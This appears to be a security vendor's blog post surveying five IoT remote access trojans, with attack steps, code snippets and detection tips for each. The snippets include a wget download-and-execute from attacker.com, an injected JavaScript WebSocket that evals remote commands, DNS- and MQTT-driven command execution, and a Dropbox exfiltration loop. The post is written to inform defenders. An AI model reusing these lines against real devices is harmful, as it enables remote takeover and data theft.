If you think IoT devices are just harmless smart assistants or home cameras, think again. In 2025, cybercriminals are exploiting these everyday conveniences as entry points for powerful Remote Access Trojans (RATs). I’ve tracked and reverse-engineered several IoT RATs this year, and it’s clear they’re no longer script-kiddie tools. These RATs are modular, stealthy, and devastating.
In this post, I’ll walk through five of the most dangerous IoT-focused RATs currently in the wild. But before diving in, let’s quickly establish what makes an IoT RAT different from the desktop or mobile variants.
-Book Your Free Security Consultation Today!
Table of Contents
What Are IoT Remote Access Trojans?
IoT Remote Access Trojans are malware designed specifically to target and control internet-connected devices like routers, IP cameras, smart TVs, and even refrigerators. Unlike typical RATs, which rely on full operating systems like Windows or Android, IoT RATs have to operate with minimal system resources and often without standard APIs.
That constraint has pushed their developers to get creative. Most IoT RATs:
Exploit weak/default credentials or outdated firmware.
Use lightweight payloads written in C, Lua, or Python.
Communicate over obscure or non-standard ports.
Persist using cron jobs, init scripts, or patched binaries.
Here are the top offenders I’ve come across in 2025.
Check Out This Blog On How Remote Access Trojans Work
1. NOIRWorm
Overview: NOIRWorm targets consumer-grade IP cameras and DVRs. It spreads laterally within home networks and uses compromised devices for surveillance or DDoS-for-hire.
Implementation Strategy:
Brute-forces Telnet and SSH using hardcoded credentials.
Drops a statically compiled MIPS binary.
Connects to a Tor-hidden C2 server.
Code Walkthrough (BusyBox infection shell snippet):
if wget http://attacker.com/noir -O /tmp/noir; then
chmod +x /tmp/noir
/tmp/noir &
fi
Detection Tip: Monitor for unknown processes running BusyBox with network sockets open. Deploy honeypots to catch brute-force attempts.
2. IoTReaper++
Overview: An upgraded version of the original IoTReaper, this variant adds WebSocket-based C2 and support for newer smart thermostats and cameras.
Implementation Strategy:
Scans for web interfaces on port 80/443.
Injects JavaScript into the device’s admin panel to create persistent sockets.
Controls the RAT using browser-like C2 sessions.
Code Walkthrough (Injected JavaScript payload):
let ws = new WebSocket('wss://attacker.site/c2');
ws.onmessage = (event) => {
eval(event.data);
};
Detection Tip: Analyze the source code of embedded web panels. Flag devices making unexplained persistent WebSocket connections to unknown domains.
3. ShadowBot
Overview: ShadowBot is an ARM-compiled binary that turns infected IoT devices into proxy relays and command execution nodes. It’s often found in botnets used for anonymizing cybercrime.
Implementation Strategy:
Uses UPnP to expose internal ports.
Installs custom iptables rules to route traffic.
Periodically polls a C2 server via DNS.
Code Walkthrough (Embedded DNS C2 resolver in C):
char *lookup_domain = "cmd.shadowdns.co";
struct hostent *host = gethostbyname(lookup_domain);
if (host) {
execute_command(host->h_addr);
}
Detection Tip: Use deep DNS inspection. Any IoT device resolving a domain multiple times per minute should raise a red flag.
4. MiraiX
Overview: MiraiX is the latest variant of the infamous Mirai botnet, redesigned for microcontrollers in smart meters and smart locks. It’s smaller, harder to detect, and runs on embedded RTOS environments.
Implementation Strategy:
Compiled with stripped symbols to reduce binary footprint.
Injects itself into firmware memory.
Uses MQTT for encrypted communication.
Code Walkthrough (MQTT Client Init in C++):
MQTTClient client("iot-server.local", 1883);
client.setCallback([](string topic, string msg) {
execute_command(msg.c_str());
});
client.subscribe("/iot/cmd");
Detection Tip: Inspect outbound MQTT connections. Unexpected connections to public brokers or encrypted MQTT over TCP/8883 is often suspicious.
5. PyWasp
Overview: PyWasp is a Python-based RAT deployed on Raspberry Pi-based IoT devices in industrial control systems. It’s designed for persistence and low-noise data theft.
Implementation Strategy:
Installs via SSH using stolen keys.
Uses cron jobs to survive reboots.
Sends logs and screen captures to Dropbox or Mega.
Code Walkthrough (Main loop):
import dropbox
client = dropbox.Dropbox('ACCESS_TOKEN')
with open('/tmp/metrics.log', 'rb') as f:
client.files_upload(f.read(), '/metrics.log')
Detection Tip: Audit cron jobs and SSH keys on embedded Linux systems. Flag IoT traffic to cloud storage services like Dropbox or Mega.
Conclusion
IoT devices are often treated as background infrastructure – plug them in, forget them. That mindset is what allows these RATs to flourish. They exploit weak configurations, hide in firmware, and communicate over unexpected protocols.
From Tor tunnels in IP cameras to MQTT in smart locks, 2025’s IoT RATs are sophisticated and quiet. They don’t just disrupt your smart home; they infiltrate corporate networks through rogue smart plugs and HVAC units.
I recommend using device discovery tools like Nmap with custom IoT signatures and combining them with memory analysis tools like Volatility or network behavior analysis with Suricata. If you’re a blue teamer, start segmenting IoT traffic, applying outbound firewall rules, and watching those low-bandwidth anomalies.
Why Businesses Trust SecureMyOrg for Comprehensive Network Security
At SecureMyOrg, we uncover and fix all possible security vulnerabilities of mobile and web, while providing solutions to mitigate risks. We are trusted by renowned companies like Yahoo, Gojek and Rippling, and with 100% client satisfaction, you’re in safe hands!
Some of the things people reach out to us for –
- Building their cybersecurity program from scratch – setting up cloud security using cost-effective tools, SIEM for alert monitoring, building policies for the company
- Vulnerability Assessment and Penetration Testing ( VAPT ) – We have certified professionals, with certifications like OSCP, CREST – CPSA & CRT, CKA and CKS
- DevSecOps consulting
- Red Teaming activity
- Regular security audits, before product release
- Full time security engineers.
Relevant Posts
Critical Zero-Day in FortiVoice Patched by Fortinet After Active Exploits
Fortinet has patched a critical zero-day vulnerability (CVE-2025-32756) exploited in active attacks targeting FortiVoice and other products like FortiMail and FortiCamera. The flaw allowed remote code execution via crafted HTTP requests, with attackers deploying malware and harvesting credentials before the fix was released.
Top 5 Cloud-Focused Remote Access Trojans in 2025
Cloud environments are prime targets in 2025, with Remote Access Trojans engineered specifically to exploit them. This blog covers the top 5 cloud-focused RATs causing major security concerns.
Top 5 Fileless Remote Access Trojans in 2025
Fileless Remote Access Trojans are redefining stealth attacks in 2025 by leaving little to no trace on disk. This blog explores the top 5 fileless RATs attackers are using today.
Dissecting AsyncRAT’s Hold on Windows Systems in 2025
AsyncRAT continues to dominate Windows system compromises in 2025 with its stealth and modular design. This post dissects how it operates and why it remains a persistent threat.
Top 5 IoT Remote Access Trojans Crippling Devices in 2025
IoT devices are under siege in 2025 as Remote Access Trojans exploit their vulnerabilities at scale. This blog breaks down the top 5 IoT RATs causing widespread disruption.
Top 5 Web-Based Remote Access Trojans That Are Dominating 2025
Web-based Remote Access Trojans are becoming the go-to tool for cybercriminals in 2025. This post highlights five of the most widespread and dangerous ones currently in use.